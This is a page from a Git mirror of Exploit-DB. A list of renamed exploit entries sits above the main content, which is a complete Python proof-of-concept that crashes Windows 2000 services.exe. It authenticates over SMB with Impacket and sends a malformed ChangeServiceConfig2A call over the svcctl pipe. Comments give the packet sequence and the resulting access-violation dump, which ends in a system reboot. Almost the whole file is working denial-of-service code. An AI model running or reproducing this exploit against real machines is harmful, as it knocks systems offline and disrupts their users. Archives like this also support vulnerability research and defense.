bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/windows/dos/3453.py
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

202 lines
5.8 KiB
Python
Executable file
Raw Blame History

#!/usr/bin/python
# MS Windows DCE-RPC svcctl ChangeServiceConfig2A() 0day Memory Corruption PoC Exploit
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Tested on Windows 2000 SP4 Polish (all patches)
#
# Requires..
# - Impacket : http://oss.coresecurity.com/projects/impacket.html
# - PyCrypto : http://www.amk.ca/python/code/crypto.html
#
# Details:..
#
# [exploit] Session Setup AndX Request, User: Administrator --> [target]
# [exploit] Session Setup AndX Response <-- [target]
# [exploit] Tree Connect AndX Request --> [target]
# [exploit] Tree Connect AndX Response <-- [target]
# [exploit] NT Create AndX Request, Path: \svcctl --> [target]
# [exploit] NT Create AndX Response, Fid: 0x4000 <-- [target]
# [exploit] DCERPC Bind UUID: SVCCTL --> [target]
# [exploit] DCERPC Bind_ack <-- [target]
# [exploit] SVCCTL OpenSCManagerW request --> [target]
# [exploit] SVCCTL OpenSCManagerW response(handle) <-- [target]
# [exploit] SVCCTL OpenServiceW request --> [target]
# [exploit] SVCCTL OpenServiceW response(handle) <-- [target]
# [exploit] SVCCTL ChangeServiceConfig2A(handle, 1, 1, 0x00000000) --> [target]
# [exploit] DCERPC Fault: status: unknwon(0xc00000fd) <-- [target]
# [exploit] SVCCTL ChangeServiceConfig2A(handle, 1, 1, 0x00000000) --> [target]
# [exploit] SMB Trans Response, Error: Unknown DoS Error <-- [target](crashed)
#
# [Module services]
# Exception C0000005 (ACCESS_VIOLATION reading [00000000])
# -------------------------------------------------------------
# EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EBX=004D83C0: 28 83 4D 00 48 84 4D 00-34 84 4D 00 48 61 08 00
# ECX=00000890: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EDX=00000001: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# ESP=015BF8C0: 34 F9 5B 01 00 00 00 00-00 FB 5B 01 00 00 00 00
# EBP=015BF8F4: 30 F9 5B 01 AD 20 01 01-B8 FB 0D 00 01 00 00 00
# ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EDI=01017000: 90 9C 07 00 FF FF FF FF-00 00 00 00 00 00 00 00
# EIP=010108A8: FF 30 68 90 A5 00 01 FF-75 FC E8 CF 1D 00 00 8B
# --> PUSH DWORD PTR [EAX]
#
# [Process services.exe terminated, system reboot]
#
# Just for fun ;]
##
from impacket.structure import Structure
from impacket.dcerpc import transport
from impacket import uuid
from random import randint
from time import sleep
host = '192.168.0.1'
username = 'Administrator'
password = 'Administrator_Password'
interface = ('svcctl', '367abb81-9844-35f1-ad32-98f038001003', '2.0')
stringbinding = "ncacn_np:%(host)s[\\pipe\\%(pipe)s]"
stringbinding %= {
'host': host,
'pipe': interface[0],
}
# random dword
def dword_rand():
s_dword = 256 ** 4
return randint(0, s_dword)
# unicode string
def utf16(str):
return str.encode('utf_16_le')
# MS RPC string
def rpcstr(str, id = 1, unicode_string = 1):
class foo(Structure):
alignment = 4
structure = ()
if(id == 1):
structure += (('id', '<L')),
structure += (
('max', '<L'),
('offset', '<L=0'),
('actual', '<L'),
('str', '%s'),
)
query = foo()
if(id == 1):
query['id'] = dword_rand()
query['max'] = len(str)
query['actual'] = len(str)
if(unicode_string == 1):
query['str'] = utf16(str)
else:
query['str'] = str
return query
# MS RPC OpenSCManager
def OpenSCManager(host, access = 1):
class foo(Structure):
opnum = 0x0f
structure = (
('str1', ':'),
('null', '<L=0'),
('access', '<L'),
)
query = foo()
query['str1'] = rpcstr("\\\\%s\x00" % (host))
query['access'] = access
return query
# MS RPC OpenServiceW
def OpenService(handle, service, access = 1):
class foo(Structure):
opnum = 0x10
structure = (
('handle', ':'),
('str1', ':'),
('access', '<L'),
)
query = foo()
query['handle'] = handle
query['str1'] = rpcstr("%s\x00" % (service), 0)
query['access'] = access
return query
trans = transport.DCERPCTransportFactory(stringbinding)
trans.set_credentials(username, password)
trans.connect()
dce = trans.DCERPC_class(trans)
dce.bind(uuid.uuidtup_to_bin((interface[1], interface[2])))
query = OpenSCManager(host, access = 1)
dce.call(query.opnum, query)
raw = dce.recv()
handle = raw[:20]
query = OpenService(handle, "RpcSs", access = 0xF01FF)
dce.call(query.opnum, query)
raw = dce.recv()
handle = raw[:20]
##
# ChangeServiceConfig2A() [IDL code generated by mIDA v1.0.7]
#
# typedef struct struct_1 {
# long elem_1;
# [switch_is(elem_1)] union union_2 elem_2;
# } struct_1 ;
#
# typedef [switch_type( unsigned long )] union union_2 {
# [case(1)] struct struct_3 * elem_1;
# [case(2)] struct struct_4 * elem_2;
# } union_2;
#
# typedef struct struct_3 {
# [string] char * elem_1;
# } struct_3 ;
#
#
# /* opcode: 0x24, address: 0x0101203B */
#
# long sub_101203B (
# [in][context_handle] void * arg_1,
# [in] struct struct_1 arg_2
# );
##
class ChangeServiceConfig2A(Structure):
opnum = 0x24
structure = (
('context_handle', ':'),
('switch_is', '<L=1'),
('case', '<L=1'),
('struct_3', '<L=0x00000000'), # <-- vulnerable argument
)
query = ChangeServiceConfig2A()
query['context_handle'] = handle
for i in range(0, 2):
dce.call(query.opnum, query)
sleep(1)
dce.disconnect()
# EoF
# milw0rm.com [2007-03-10]
Reference in a new issue View git blame Copy permalink